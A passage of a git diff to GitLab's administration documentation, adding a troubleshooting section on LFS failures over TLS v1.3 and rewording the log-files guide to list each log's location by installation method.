`Google::Apis::TransmissionError: execution expired` If LFS integration is configured with Google Cloud Storage and background uploads (`background_upload: true` and `direct_upload: false`), Sidekiq workers may encounter this error. This is because the uploading timed out with very large files. @@ -276,10 +321,33 @@ end See more information in [!19581](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/19581) +### LFS commands fail on TLS v1.3 server + +If you configure GitLab to [disable TLS v1.2](https://docs.gitlab.com/omnibus/settings/nginx.md) +and only enable TLS v1.3 connections, LFS operations require a +[Git LFS client](https://git-lfs.github.com) version 2.11.0 or later. If you use +a Git LFS client earlier than version 2.11.0, GitLab displays an error: + +```plaintext +batch response: Post https://username:***@gitlab.example.com/tool/releases.git/info/lfs/objects/batch: remote error: tls: protocol version not supported +error: failed to fetch some objects from 'https://username:[MASKED]@gitlab.example.com/tool/releases.git/info/lfs' +``` + +When using GitLab CI over a TLS v1.3 configured GitLab server, you must +[upgrade to GitLab Runner](https://docs.gitlab.com/runner/install/index.md) 13.2.0 +or later to receive an updated Git LFS client version via +the included [GitLab Runner Helper image](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#helper-image). + +To check an installed Git LFS client's version, run this command: + +```shell +git lfs version +``` + ## Known limitations - Support for removing unreferenced LFS objects was added in 8.14 onward. - LFS authentications via SSH was added with GitLab 8.12. - Only compatible with the Git LFS client versions 1.1.0 and later, or 1.0.2. -- The storage statistics count each LFS object multiple times for +- The storage statistics count each LFS object for every project linking to it. diff --git a/doc/administration/logs.md b/doc/administration/logs.md index cf9c2143d8c..b1605604df5 100644 --- a/doc/administration/logs.md +++ b/doc/administration/logs.md @@ -8,8 +8,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w GitLab has an advanced log system where everything is logged, so you can analyze your instance using various system log files. In addition to -system log files, GitLab Enterprise Edition provides Audit Events. -Find more about them [in Audit Events documentation](audit_events.md). +system log files, GitLab Enterprise Edition provides [Audit Events](audit_events.md). System log files are typically plain text in a standard log file format. This guide talks about how to read and use these system log files. @@ -30,45 +29,48 @@ The logs for a given service may be managed and rotated by: - `logrotate` and `svlogd` - Or not at all -The table below includes information about what is responsible for managing and rotating logs for +The following table includes information about what's responsible for managing and rotating logs for the included services. Logs [managed by `svlogd`](https://docs.gitlab.com/omnibus/settings/logs.html#runit-logs) are written to a file called `current`. The `logrotate` service built into GitLab [manages all logs](https://docs.gitlab.com/omnibus/settings/logs.html#logrotate) except those captured by `runit`. -| Log Type | Managed by logrotate | Managed by svlogd/runit | -| ----------------------------------------------- | -------------------- | ----------------------- | -| [Alertmanager Logs](#alertmanager-logs) | N | Y | -| [Crond Logs](#crond-logs) | N | Y | -| [Gitaly](#gitaly-logs) | Y | Y | -| [GitLab Exporter For Omnibus](#gitlab-exporter) | N | Y | -| [GitLab Pages Logs](#pages-logs) | Y | Y | -| GitLab Rails | Y | N | -| [GitLab Shell Logs](#gitlab-shelllog) | Y | N | -| [Grafana Logs](#grafana-logs) | N | Y | -| [LogRotate Logs](#logrotate-logs) | N | Y | -| [Mailroom](#mail_room_jsonlog-default) | Y | Y | -| [NGINX](#nginx-logs) | Y | Y | -| [PostgreSQL Logs](#postgresql-logs) | N | Y | -| [Prometheus Logs](#prometheus-logs) | N | Y | -| [Puma](#puma-logs) | Y | Y | -| [Redis Logs](#redis-logs) | N | Y | -| [Registry Logs](#registry-logs) | N | Y | -| [Workhorse Logs](#workhorse-logs) | Y | Y | +| Log type | Managed by logrotate | Managed by svlogd/runit | +|-------------------------------------------------|------------------------|-------------------------| +| [Alertmanager Logs](#alertmanager-logs) | **{dotted-circle}** No | **{check-circle}** Yes | +| [Crond Logs](#crond-logs) | **{dotted-circle}** No | **{check-circle}** Yes | +| [Gitaly](#gitaly-logs) | **{check-circle}** Yes | **{check-circle}** Yes | +| [GitLab Exporter for Omnibus](#gitlab-exporter) | **{dotted-circle}** No | **{check-circle}** Yes | +| [GitLab Pages Logs](#pages-logs) | **{check-circle}** Yes | **{check-circle}** Yes | +| GitLab Rails | **{check-circle}** Yes | **{dotted-circle}** No | +| [GitLab Shell Logs](#gitlab-shelllog) | **{check-circle}** Yes | **{dotted-circle}** No | +| [Grafana Logs](#grafana-logs) | **{dotted-circle}** No | **{check-circle}** Yes | +| [LogRotate Logs](#logrotate-logs) | **{dotted-circle}** No | **{check-circle}** Yes | +| [Mailroom](#mail_room_jsonlog-default) | **{check-circle}** Yes | **{check-circle}** Yes | +| [NGINX](#nginx-logs) | **{check-circle}** Yes | **{check-circle}** Yes | +| [PostgreSQL Logs](#postgresql-logs) | **{dotted-circle}** No | **{check-circle}** Yes | +| [Prometheus Logs](#prometheus-logs) | **{dotted-circle}** No | **{check-circle}** Yes | +| [Puma](#puma-logs) | **{check-circle}** Yes | **{check-circle}** Yes | +| [Redis Logs](#redis-logs) | **{dotted-circle}** No | **{check-circle}** Yes | +| [Registry Logs](#registry-logs) | **{dotted-circle}** No | **{check-circle}** Yes | +| [Workhorse Logs](#workhorse-logs) | **{check-circle}** Yes | **{check-circle}** Yes | ## `production_json.log` -This file lives in `/var/log/gitlab/gitlab-rails/production_json.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/production_json.log` for -installations from source. When GitLab is running in an environment -other than production, the corresponding log file is shown here. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/production_json.log` +- Installations from source: `/home/git/gitlab/log/production_json.log` + +When GitLab is running in an environment other than production, +the corresponding log file is shown here. It contains a structured log for Rails controller requests received from -GitLab, thanks to [Lograge](https://github.com/roidrage/lograge/). Note that -requests from the API are logged to a separate file in `api_json.log`. +GitLab, thanks to [Lograge](https://github.com/roidrage/lograge/). +Requests from the API are logged to a separate file in `api_json.log`. -Each line contains a JSON line that can be ingested by services like Elasticsearch and Splunk. +Each line contains JSON that can be ingested by services like Elasticsearch and Splunk. Line breaks were added to examples for legibility: ```json @@ -103,39 +105,39 @@ This example was a GET request for a specific issue. Each line also contains performance data, with times in seconds: -1. `duration_s`: total time taken to retrieve the request -1. `queue_duration_s`: total time that the request was queued inside GitLab Workhorse -1. `view_duration_s`: total time taken inside the Rails views -1. `db_duration_s`: total time to retrieve data from PostgreSQL -1. `cpu_s`: total time spent on CPU -1. `gitaly_duration_s`: total time taken by Gitaly calls -1. `gitaly_calls`: total number of calls made to Gitaly -1. `redis_calls`: total number of calls made to Redis -1. `redis_duration_s`: total time to retrieve data from Redis -1. `redis_read_bytes`: total bytes read from Redis -1. `redis_write_bytes`: total bytes written to Redis -1. `redis_<instance>_calls`: total number of calls made to a Redis instance -1. `redis_<instance>_duration_s`: total time to retrieve data from a Redis instance -1. `redis_<instance>_read_bytes`: total bytes read from a Redis instance -1. `redis_<instance>_write_bytes`: total bytes written to a Redis instance - -User clone and fetch activity using HTTP transport appears in this log as `action: git_upload_pack`. +- `duration_s`: Total time to retrieve the request +- `queue_duration_s`: Total time the request was queued inside GitLab Workhorse +- `view_duration_s`: Total time inside the Rails views +- `db_duration_s`: Total time to retrieve data from PostgreSQL +- `cpu_s`: Total time spent on CPU +- `gitaly_duration_s`: Total time by Gitaly calls +- `gitaly_calls`: Total number of calls made to Gitaly +- `redis_calls`: Total number of calls made to Redis +- `redis_duration_s`: Total time to retrieve data from Redis +- `redis_read_bytes`: Total bytes read from Redis +- `redis_write_bytes`: Total bytes written to Redis +- `redis_<instance>_calls`: Total number of calls made to a Redis instance +- `redis_<instance>_duration_s`: Total time to retrieve data from a Redis instance +- `redis_<instance>_read_bytes`: Total bytes read from a Redis instance +- `redis_<instance>_write_bytes`: Total bytes written to a Redis instance + +User clone and fetch activity using HTTP transport appears in the log as `action: git_upload_pack`. In addition, the log contains the originating IP address, (`remote_ip`), the user's ID (`user_id`), and username (`username`). -Some endpoints such as `/search` may make requests to Elasticsearch if using +Some endpoints (such as `/search`) may make requests to Elasticsearch if using [Advanced Search](../user/search/advanced_search.md). These additionally log `elasticsearch_calls` and `elasticsearch_call_duration_s`, which correspond to: -1. `elasticsearch_calls`: total number of calls to Elasticsearch -1. `elasticsearch_duration_s`: total time taken by Elasticsearch calls -1. `elasticsearch_timed_out_count`: total number of calls to Elasticsearch that +- `elasticsearch_calls`: Total number of calls to Elasticsearch +- `elasticsearch_duration_s`: Total time taken by Elasticsearch calls +- `elasticsearch_timed_out_count`: Total number of calls to Elasticsearch that timed out and therefore returned partial results -ActionCable connection and subscription events are also logged to this file and they follow the same -format above. The `method`, `path`, and `format` fields are not applicable, and are always empty. +ActionCable connection and subscription events are also logged to this file and they follow the +previous format. The `method`, `path`, and `format` fields are not applicable, and are always empty. The ActionCable connection or channel class is used as the `controller`. ```json @@ -206,10 +208,13 @@ Starting with GitLab 12.5, if an error occurs, an ## `production.log` -This file lives in `/var/log/gitlab/gitlab-rails/production.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/production.log` for -installations from source. (When GitLab is running in an environment -other than production, the corresponding log file is shown here.) +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/production.log` +- Installations from source: `/home/git/gitlab/log/production.log` + +When GitLab is running in an environment other than production, +the corresponding log file is shown here. It contains information about all performed requests. You can see the URL and type of request, IP address, and what parts of code were @@ -244,9 +249,10 @@ The request was processed by `Projects::TreeController`. > Introduced in GitLab 10.0. -This file lives in -`/var/log/gitlab/gitlab-rails/api_json.log` for Omnibus GitLab packages, or in -`/home/git/gitlab/log/api_json.log` for installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/api_json.log` +- Installations from source: `/home/git/gitlab/log/api_json.log` It helps you see requests made directly to the API. For example: @@ -274,24 +280,25 @@ It helps you see requests made directly to the API. For example: ``` This entry shows an internal endpoint accessed to check whether an -associated SSH key can download the project in question via a `git fetch` or +associated SSH key can download the project in question by using a `git fetch` or `git clone`. In this example, we see: -1. `duration`: total time in milliseconds taken to retrieve the request -1. `queue_duration`: total time in milliseconds that the request was queued inside GitLab Workhorse -1. `method`: The HTTP method used to make the request -1. `path`: The relative path of the query -1. `params`: Key-value pairs passed in a query string or HTTP body. Sensitive parameters (such as passwords and tokens) are filtered out. -1. `ua`: The User-Agent of the requester +- `duration`: Total time in milliseconds to retrieve the request +- `queue_duration`: Total time in milliseconds the request was queued inside GitLab Workhorse +- `method`: The HTTP method used to make the request +- `path`: The relative path of the query +- `params`: Key-value pairs passed in a query string or HTTP body (sensitive parameters, such as passwords and tokens, are filtered out) +- `ua`: The User-Agent of the requester ## `application.log` -This file lives in `/var/log/gitlab/gitlab-rails/application.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/application.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/application.log` +- Installations from source: `/home/git/gitlab/log/application.log` -It helps you discover events happening in your instance such as user creation, -project removing and so on. For example: +It helps you discover events happening in your instance such as user creation +and project removal. For example: ```plaintext October 06, 2014 11:56: User "Administrator" (admin@example.com) was created @@ -305,11 +312,12 @@ October 07, 2014 11:25: Project "project133" was removed > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/22812) in GitLab 12.7. -This file lives in `/var/log/gitlab/gitlab-rails/application_json.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/application_json.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/application_json.log` +- Installations from source: `/home/git/gitlab/log/application_json.log` -It contains the JSON version of the logs in `application.log` like the example below: +It contains the JSON version of the logs in `application.log`, like this example: ```json { @@ -328,11 +336,14 @@ It contains the JSON version of the logs in `application.log` like the example b ## `integrations_json.log` -This file lives in `/var/log/gitlab/gitlab-rails/integrations_json.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/integrations_json.log` for -installations from source. +Depending on your installation method, this file is located at: -It contains information about [integrations](../user/project/integrations/overview.md) activities such as Jira, Asana, and Irker services. It uses JSON format like the example below: +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/integrations_json.log` +- Installations from source: `/home/git/gitlab/log/integrations_json.log` + +It contains information about [integration](../user/project/integrations/overview.md) +activities, such as Jira, Asana, and Irker services. It uses JSON format, +like this example: ```json { @@ -360,16 +371,16 @@ It contains information about [integrations](../user/project/integrations/overvi > Introduced in GitLab 11.6. -This file lives in -`/var/log/gitlab/gitlab-rails/kubernetes.log` for Omnibus GitLab -packages or in `/home/git/gitlab/log/kubernetes.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/kubernetes.log` +- Installations from source: `/home/git/gitlab/log/kubernetes.log` -It logs information related to the Kubernetes Integration including errors +It logs information related to the Kubernetes Integration, including errors during installing cluster applications on your managed Kubernetes clusters. -Each line contains a JSON line that can be ingested by services like Elasticsearch and Splunk. +Each line contains JSON that can be ingested by services like Elasticsearch and Splunk. Line breaks have been added to the following example for clarity: ```json @@ -399,9 +410,10 @@ Line breaks have been added to the following example for clarity: ## `git_json.log` -This file lives in `/var/log/gitlab/gitlab-rails/git_json.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/git_json.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/git_json.log` +- Installations from source: `/home/git/gitlab/log/git_json.log` After GitLab version 12.2, this file was renamed from `githost.log` to `git_json.log` and stored in JSON format. @@ -425,14 +437,15 @@ only. For example: NOTE: GitLab Free tracks a small number of different audit events. -[GitLab Premium](https://about.gitlab.com/pricing/) tracks many more. +GitLab Premium tracks many more. -This file lives in `/var/log/gitlab/gitlab-rails/audit_json.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/audit_json.log` for -installations from source. +Depending on your installation method, this file is located at: -Changes to group or project settings and memberships (`target_details`) are logged to this file. -For example: +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/audit_json.log` +- Installations from source: `/home/git/gitlab/log/audit_json.log` + +Changes to group or project settings and memberships (`target_details`) +are logged to this file. For example: ```json { @@ -454,15 +467,17 @@ For example: ## Sidekiq Logs NOTE: -In Omnibus GitLab `12.10` or earlier, the Sidekiq log lives in `/var/log/gitlab/gitlab-rails/sidekiq.log`. +In Omnibus GitLab `12.10` or earlier, the Sidekiq log is at `/var/log/gitlab/gitlab-rails/sidekiq.log`. -For Omnibus installations, some Sidekiq logs reside in `/var/log/gitlab/sidekiq/current` and as follows. +For Omnibus GitLab installations, some Sidekiq logs are in `/var/log/gitlab/sidekiq/current` +and as follows. ### `sidekiq.log` -This file lives in `/var/log/gitlab/sidekiq/current` for -Omnibus GitLab packages or in `/home/git/gitlab/log/sidekiq.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/sidekiq/current` +- Installations from source: `/home/git/gitlab/log/sidekiq.log` GitLab uses background jobs for processing tasks which can take a long time. All information about processing these jobs are written down to @@ -473,7 +488,7 @@ this file. For example: 2014-06-10T18:18:26Z 14299 TID-55uqo INFO: Booting Sidekiq 3.0.0 with redis options {:url=>"redis://localhost:6379/0", :namespace=>"sidekiq"} ``` -Instead of the format above, you can opt to generate JSON logs for +Instead of the previous format, you can opt to generate JSON logs for Sidekiq. For example: ```json @@ -506,7 +521,7 @@ For Omnibus GitLab installations, add the configuration option: sidekiq['log_format'] = 'json' ``` -For source installations, edit the `gitlab.yml` and set the Sidekiq +For installations from source, edit the `gitlab.yml` and set the Sidekiq `log_format` configuration option: ```yaml @@ -519,9 +534,10 @@ For source installations, edit the `gitlab.yml` and set the Sidekiq > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/26586) in GitLab 12.9. -This file lives in `/var/log/gitlab/gitlab-rails/sidekiq_client.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/sidekiq_client.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/sidekiq_client.log` +- Installations from source: `/home/git/gitlab/log/sidekiq_client.log` This file contains logging information about jobs before Sidekiq starts processing them, such as before being enqueued. @@ -532,11 +548,15 @@ you've configured this for Sidekiq as mentioned above. ## `gitlab-shell.log` -GitLab Shell is used by GitLab for executing Git commands and provide SSH access to Git repositories. +GitLab Shell is used by GitLab for executing Git commands and provide SSH +access to Git repositories. ### For GitLab versions 12.10 and up -For GitLab version 12.10 and later, there are 2 `gitlab-shell.log` files. Information containing `git-{upload-pack,receive-pack}` requests lives in `/var/log/gitlab/gitlab-shell/gitlab-shell.log`. Information about hooks to GitLab Shell from Gitaly lives in `/var/log/gitlab/gitaly/gitlab-shell.log`. +For GitLab version 12.10 and later, there are two `gitlab-shell.log` files. +Information containing `git-{upload-pack,receive-pack}` requests is at +`/var/log/gitlab/gitlab-shell/gitlab-shell.log`. Information about hooks to +GitLab Shell from Gitaly is at `/var/log/gitlab/gitaly/gitlab-shell.log`. Example log entries for `/var/log/gitlab/gitlab-shell/gitlab-shell.log`: @@ -589,7 +609,11 @@ Example log entries for `/var/log/gitlab/gitaly/gitlab-shell.log`: ### For GitLab versions 12.5 through 12.9 -For GitLab 12.5 to 12.9, this file lives in `/var/log/gitlab/gitaly/gitlab-shell.log` for Omnibus GitLab packages or in `/home/git/gitaly/gitlab-shell.log` for installations from source. +For GitLab 12.5 to 12.9, depending on your installation method, this +file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitaly/gitlab-shell.log` +- Installation from source: `/home/git/gitaly/gitlab-shell.log` Example log entries: @@ -608,7 +632,7 @@ Example log entries: ### For GitLab 12.5 and earlier -For GitLab 12.5 and earlier, the file lives in `/var/log/gitlab/gitlab-shell/gitlab-shell.log`. +For GitLab 12.5 and earlier, the file is at `/var/log/gitlab/gitlab-shell/gitlab-shell.log`. Example log entries: @@ -617,51 +641,64 @@ I, [2015-02-13T06:17:00.671315 #9291] INFO -- : Adding project root/example.git I, [2015-02-13T06:17:00.679433 #9291] INFO -- : Moving existing hooks directory and symlinking global hooks directory for /var/opt/gitlab/git-data/repositories/root/example.git. ``` -User clone/fetch activity using SSH transport appears in this log as `executing git command <gitaly-upload-pack...`. +User clone/fetch activity using SSH transport appears in this log as +`executing git command <gitaly-upload-pack...`. ## Gitaly Logs -This file lives in `/var/log/gitlab/gitaly/current` and is produced by [runit](http://smarden.org/runit/). `runit` is packaged with Omnibus GitLab and a brief explanation of its purpose is available [in the Omnibus GitLab documentation](https://docs.gitlab.com/omnibus/architecture/#runit). [Log files are rotated](http://smarden.org/runit/svlogd.8.html), renamed in Unix timestamp format, and `gzip`-compressed (like `@1584057562.s`). +This file is in `/var/log/gitlab/gitaly/current` and is produced by [runit](http://smarden.org/runit/). +`runit` is packaged with Omnibus GitLab and a brief explanation of its purpose +is available [in the Omnibus GitLab documentation](https://docs.gitlab.com/omnibus/architecture/#runit). +[Log files are rotated](http://smarden.org/runit/svlogd.8.html), renamed in +Unix timestamp format, and `gzip`-compressed (like `@1584057562.s`). ### `grpc.log` -This file lives in `/var/log/gitlab/gitlab-rails/grpc.log` for Omnibus GitLab packages. Native [gRPC](https://grpc.io/) logging used by Gitaly. +This file is at `/var/log/gitlab/gitlab-rails/grpc.log` for Omnibus GitLab +packages. Native [gRPC](https://grpc.io/) logging used by Gitaly. ### `gitaly_ruby_json.log` > [Introduced](https://gitlab.com/gitlab-org/gitaly/-/merge_requests/2678) in GitLab 13.6. -This file lives in `/var/log/gitlab/gitaly/gitaly_ruby_json.log` and is produced by [`gitaly-ruby`](gitaly/reference.md#gitaly-ruby). It contains an access log of gRPC calls made by Gitaly to `gitaly-ruby`. +This file is at `/var/log/gitlab/gitaly/gitaly_ruby_json.log` and is +produced by [`gitaly-ruby`](gitaly/reference.md#gitaly-ruby). It contains an +access log of gRPC calls made by Gitaly to `gitaly-ruby`. ## Puma Logs ### `puma_stdout.log` -This file lives in `/var/log/gitlab/puma/puma_stdout.log` for -Omnibus GitLab packages, and `/home/git/gitlab/log/puma_stdout.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/puma/puma_stdout.log` +- Installations from source: `/home/git/gitlab/log/puma_stdout.log` ### `puma_stderr.log` -This file lives in `/var/log/gitlab/puma/puma_stderr.log` for -Omnibus GitLab packages, or in `/home/git/gitlab/log/puma_stderr.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/puma/puma_stderr.log` +- Installations from source: `/home/git/gitlab/log/puma_stderr.log` ## `repocheck.log` -This file lives in `/var/log/gitlab/gitlab-rails/repocheck.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/repocheck.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/repocheck.log` +- Installations from source: `/home/git/gitlab/log/repocheck.log` -It logs information whenever a [repository check is run](repository_checks.md) on a project. +It logs information whenever a [repository check is run](repository_checks.md) +on a project. ## `importer.log` > Introduced in GitLab 11.3. -This file lives in `/var/log/gitlab/gitlab-rails/importer.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/importer.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/importer.log` +- Installations from source: `/home/git/gitlab/log/importer.log` It logs the progress of the import process. @@ -669,9 +706,10 @@ It logs the progress of the import process. > Introduced in GitLab 13.1. -This file lives in `/var/log/gitlab/gitlab-rails/exporter.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/exporter.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/exporter.log` +- Installations from source: `/home/git/gitlab/log/exporter.log` It logs the progress of the export process. @@ -679,10 +717,10 @@ It logs the progress of the export process. > [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/59587) in GitLab 13.7. -This file's location depends on how you installed GitLab: +Depending on your installation method, this file is located at: -- For Omnibus GitLab packages: `/var/log/gitlab/gitlab-rails/features_json.log` -- For installations from source: `/home/git/gitlab/log/features_json.log` +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/features_json.log` +- Installations from source: `/home/git/gitlab/log/features_json.log` The modification events from [Feature flags in development of GitLab](../development/feature_flags/index.md) are recorded in this file. For example: @@ -704,27 +742,29 @@ are recorded in this file. For example: > Introduced in GitLab 12.0. -This file lives in `/var/log/gitlab/gitlab-rails/auth.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/auth.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/auth.log` +- Installations from source: `/home/git/gitlab/log/auth.log` This log records: - Information whenever [Rack Attack](../security/rack_attack.md) registers an abusive request. - Requests over the [Rate Limit](../user/admin_area/settings/rate_limits_on_raw_endpoints.md) on raw endpoints. - [Protected paths](../user/admin_area/settings/protected_paths.md) abusive requests. -- In GitLab versions [12.3](https://gitlab.com/gitlab-org/gitlab/-/issues/29239) and greater, +- In GitLab versions [12.3](https://gitlab.com/gitlab-org/gitlab/-/issues/29239) and later, user ID and username, if available. ## `graphql_json.log` > [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/59587) in GitLab 12.0. -This file lives in `/var/log/gitlab/gitlab-rails/graphql_json.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/graphql_json.log` for -installations from source. +Depending on your installation method, this file is located at: -GraphQL queries are recorded in that file. For example: +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/graphql_json.log` +- Installations from source: `/home/git/gitlab/log/graphql_json.log` + +GraphQL queries are recorded in the file. For example: ```json {"query_string":"query IntrospectionQuery{__schema {queryType { name },mutationType { name }}}...(etc)","variables":{"a":1,"b":2},"complexity":181,"depth":1,"duration_s":7} @@ -734,24 +774,26 @@ GraphQL queries are recorded in that file. For example: > Introduced in GitLab 12.3. -This file lives in `/var/log/gitlab/gitlab-rails/migrations.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/migrations.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/migrations.log` +- Installations from source: `/home/git/gitlab/log/migrations.log` ## `mail_room_json.log` (default) > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/19186) in GitLab 12.6. -This file lives in `/var/log/gitlab/mailroom/current` for -Omnibus GitLab packages or in `/home/git/gitlab/log/mail_room_json.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/mailroom/current` +- Installations from source: `/home/git/gitlab/log/mail_room_json.log` This structured log file records internal activity in the `mail_room` gem. Its name and path are configurable, so the name and path may not match the above. -## Reconfigure Logs +## Reconfigure logs -Reconfigure log files live in `/var/log/gitlab/reconfigure` for Omnibus GitLab +Reconfigure log files are in `/var/log/gitlab/reconfigure` for Omnibus GitLab packages. Installations from source don't have reconfigure logs. A reconfigure log is populated whenever `gitlab-ctl reconfigure` is run manually or as part of an upgrade. @@ -763,46 +805,47 @@ was initiated, such as `1509705644.log` If Prometheus metrics and the Sidekiq Exporter are both enabled, Sidekiq starts a Web server and listen to the defined port (default: `8082`). By default, Sidekiq Exporter access logs are disabled but can -be enabled: +be enabled based on your installation method: -- For Omnibus GitLab installations, using the `sidekiq['exporter_log_enabled'] = true` - option in `/etc/gitlab/gitlab.rb`. -- For installations from source, using the `sidekiq_exporter.log_enabled` option - in `gitlab.yml`. +- Omnibus GitLab: Use the `sidekiq['exporter_log_enabled'] = true` + option in `/etc/gitlab/gitlab.rb` +- Installations from source: Use the `sidekiq_exporter.log_enabled` option + in `gitlab.yml` -When enabled, access logs are generated in -`/var/log/gitlab/gitlab-rails/sidekiq_exporter.log` for Omnibus GitLab -packages or in `/home/git/gitlab/log/sidekiq_exporter.log` for -installations from source. +When enabled, depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/sidekiq_exporter.log` +- Installations from source: `/home/git/gitlab/log/sidekiq_exporter.log` If Prometheus metrics and the Web Exporter are both enabled, Puma starts a Web server and listen to the defined port (default: `8083`), and access logs -are generated: +are generated in a location based on your installation method: -- For Omnibus GitLab packages, in `/var/log/gitlab/gitlab-rails/web_exporter.log`. -- For installations from source, in `/home/git/gitlab/log/web_exporter.log`. +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/web_exporter.log` +- Installations from source: `/home/git/gitlab/log/web_exporter.log` ## `database_load_balancing.log` **(PREMIUM SELF)** > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/15442) in GitLab 12.3. Contains details of GitLab [Database Load Balancing](database_load_balancing.md). -It's stored at: +Depending on your installation method, this file is located at: -- `/var/log/gitlab/gitlab-rails/database_load_balancing.log` for Omnibus GitLab packages. -- `/home/git/gitlab/log/database_load_balancing.log` for installations from source. +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/database_load_balancing.log` +- Installations from source: `/home/git/gitlab/log/database_load_balancing.log` ## `elasticsearch.log` **(PREMIUM SELF)** > Introduced in GitLab 12.6. This file logs information related to the Elasticsearch Integration, including -errors during indexing or searching Elasticsearch. It's stored at: +errors during indexing or searching Elasticsearch. Depending on your installation +method, this file is located at: -- `/var/log/gitlab/gitlab-rails/elasticsearch.log` for Omnibus GitLab packages. -- `/home/git/gitlab/log/elasticsearch.log` for installations from source. +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/elasticsearch.log` +- Installations from source: `/home/git/gitlab/log/elasticsearch.log` -Each line contains a JSON line that can be ingested by services like Elasticsearch and Splunk. +Each line contains JSON that can be ingested by services like Elasticsearch and Splunk. Line breaks have been added to the following example line for clarity: ```json @@ -825,12 +868,13 @@ Line breaks have been added to the following example line for clarity: This file logs the information about exceptions being tracked by `Gitlab::ErrorTracking`, which provides a standard and consistent way of -[processing rescued exceptions](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/development/logging.md#exception-handling). This file is stored in: +[processing rescued exceptions](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/development/logging.md#exception-handling). +Depending on your installation method, this file is located at: -- `/var/log/gitlab/gitlab-rails/exceptions_json.log` for Omnibus GitLab packages. -- `/home/git/gitlab/log/exceptions_json.log` for installations from source. +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/exceptions_json.log` +- Installations from source: `/home/git/gitlab/log/exceptions_json.log` -Each line contains a JSON line that can be ingested by Elasticsearch. For example: +Each line contains JSON that can be ingested by Elasticsearch. For example: ```json { @@ -853,9 +897,10 @@ Each line contains a JSON line that can be ingested by Elasticsearch. For exampl > Introduced in GitLab 13.0. -This file lives in `/var/log/gitlab/gitlab-rails/service_measurement.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/service_measurement.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/service_measurement.log` +- Installations from source: `/home/git/gitlab/log/service_measurement.log` It contains only a single structured log with measurements for each service execution. It contains measurements such as the number of SQL calls, `execution_time`, `gc_stats`, and `memory usage`. @@ -870,9 +915,12 @@ For example: > Introduced in 9.5. -Geo stores structured log messages in a `geo.log` file. For Omnibus installations, this file is at `/var/log/gitlab/gitlab-rails/geo.log`. +Geo stores structured log messages in a `geo.log` file. For Omnibus GitLab +installations, this file is at `/var/log/gitlab/gitlab-rails/geo.log`. -This file contains information about when Geo attempts to sync repositories and files. Each line in the file contains a separate JSON entry that can be ingested into. For example, Elasticsearch or Splunk. +This file contains information about when Geo attempts to sync repositories +and files. Each line in the file contains a separate JSON entry that can be +ingested into (for example, Elasticsearch or Splunk). For example: @@ -886,10 +934,10 @@ This message shows that Geo detected that a repository update was needed for pro > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/commit/7f637e2af7006dc2b1b2649d9affc0b86cfb33c4) in GitLab 11.12. -This file is stored in: 